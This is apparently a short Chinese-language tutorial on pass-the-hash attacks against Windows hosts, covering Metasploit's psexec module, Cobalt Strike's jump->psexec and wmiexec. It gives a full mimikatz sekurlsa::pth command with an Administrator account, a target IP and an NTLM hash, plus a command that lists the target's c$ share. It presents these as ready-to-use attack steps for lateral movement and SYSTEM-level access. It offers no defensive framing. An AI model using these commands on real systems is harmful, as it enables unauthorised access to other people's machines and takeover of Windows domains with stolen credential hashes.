简介

Pass the hash也就是Hash传递攻击，简称为PTH。模拟用户登录不需要用户明文密码只需要hash值就可以直接来登录目标系统。

利用前提条件是：

• 开启445端口
• 开启ipc$共享

Metasploit pesexec模块

windows/smb/psexec

这里主要设置smbuser、smbPass

这里的smbpass也可以使用明文密码登录

Mimikatz hash传递攻击

mimikatz.exe "privilege::debug"  "sekurlsa::pth /user:Administrator /domain:192.168.222.135 /ntlm:99f249f5481f98de98f14cc8985d610b" exit

运行后会出现一个弹窗，可以直接使用ipc连接

dir \\192.168.222.135\c$

wmiexec/smbexec进行hash传递

 wmiexec.exe -hashes LMHash:NTHash 用户名@目标IP

这里的wmiexec.exe是通过wmiexec.py编译的

cs的hash传递攻击

首先进行内网扫描，选择jump->psexec

选择其中的参数

稍作等待成功上线，且为system权限

powershell的hash传递攻击

这个的话总是报错，就无法执行成功，可参考其他文章进行学习

Invoke-TheHash：PowerShell实现的哈希传递攻击套件 - FreeBuf网络安全行业门户